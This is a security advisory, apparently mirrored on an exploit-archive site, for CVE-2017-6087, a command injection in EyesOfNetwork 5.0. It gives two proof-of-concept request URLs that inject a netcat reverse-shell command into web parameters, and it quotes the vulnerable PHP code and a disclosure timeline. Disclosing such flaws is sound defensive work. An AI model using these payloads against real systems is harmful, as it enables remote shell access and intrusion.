Skip to content
cyberexploits
webappphptext

EyesOfNetwork (EON) 5.0 - Remote Code Execution

EyesOfNetwork (EON) 5.0 - Remote Code Execution

Published on 2017-03-27

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/php/webapps/41746.txt7eac4c3a
raw
# [CVE-2017-6087] EON 5.0 Remote Code Execution



## Description



EyesOfNetwork ("EON") is an OpenSource network monitoring solution.



## Remote Code Execution (authenticated)



The Eonweb code does not correctly filter arguments, allowing

authenticated users to execute arbitrary code.



**CVE ID**: CVE-2017-6087



**Access Vector**: remote



**Security Risk**: high



**Vulnerability**: CWE-78



**CVSS Base Score**: 7.6



**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L





### Proof of Concept 1



On the attacker's host, we start a handler:



```

nc -lvp 1337

```



The `selected_events` parameter is not correctly filtered before it is

used by the `shell_exec()` function.



There, it is possible to inject a payload like in the request below,

where we connect back to our handler:



```

https://eonweb.local/module/monitoring_ged/ged_actions.php?queue=history&action=confirm&global_action=4&selected_events%5B%5D=;nc%2010.0.5.124%201337%20-e%20/bin/bash;

```



#### Vulnerable code



The payload gets injected into the `$event[$key]` and `$ged_command`

variables of the `module/monitoring_ged/ged_functions.php` file, line 373:



```

$ged_command = "-update -type $ged_type_nbr ";

foreach ($array_ged_packets as $key => $value) {

  if($value["type"] == true){

    if($key == "owner"){

      $event[$key] = $owner;

    }

    $ged_command .= "\"".$event[$key]."\" ";

  }

}

$ged_command = trim($ged_command, " ");

shell_exec($path_ged_bin." ".$ged_command);

```



Two other functions in this file are also affected by this problem:



* `delete($selected_events, $queue);`

* `ownDisown($selected_events, $queue, $global_action);`





### Proof of Concept 2



On the attacker's host, we start a handler:



```

nc -lvp 1337

```



The `module` parameter is not correctly filtered before it is used by

the `shell_exec()` function.



Again, we inject our connecting back payload:



```

https://eonweb.local/module/index.php?module=|nc%20192.168.1.14%201337%20-e%20/bin/bash&link=padding

```



#### Vulnerable code



In the `module/index.php` file, line 24, we can see that our payload is

injected into the `exec()` function without any sanitization:



```

# Check optionnal module to load

if(isset($_GET["module"]) && isset($_GET["link"])) {



	$module=exec("rpm -q ".$_GET["module"]." |grep '.eon' |wc -l");



	# Redirect to module page if rpm installed

	if($module!=0) { header('Location: '.$_GET["link"].''); }



}

```





## Timeline (dd/mm/yyyy)



* 01/10/2016 : Initial discovery.

* 09/10/2016 : Fisrt contact with vendor.

* 23/10/2016 : Technical details sent to the security contact.

* 27/10/2016 : Vendor akwnoledgement and first patching attempt.

* 11/10/2016 : Testing the patch revealed that it needed more work.

* 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed.

* 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our

repsonsible disclosure agreement.

* 14/03/2017 : Public disclosure.



Thank you to EON for the fast response.



## Solution



Update to version 5.1



## Affected versions



* Version <= 5.0



## Credits



* Nicolas SERRA <n.serra@sysdream.com>



-- SYSDREAM Labs <labs@sysdream.com> 

GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 

* Website: https://sysdream.com/ * 

Twitter: @sysdream 
View on GitHub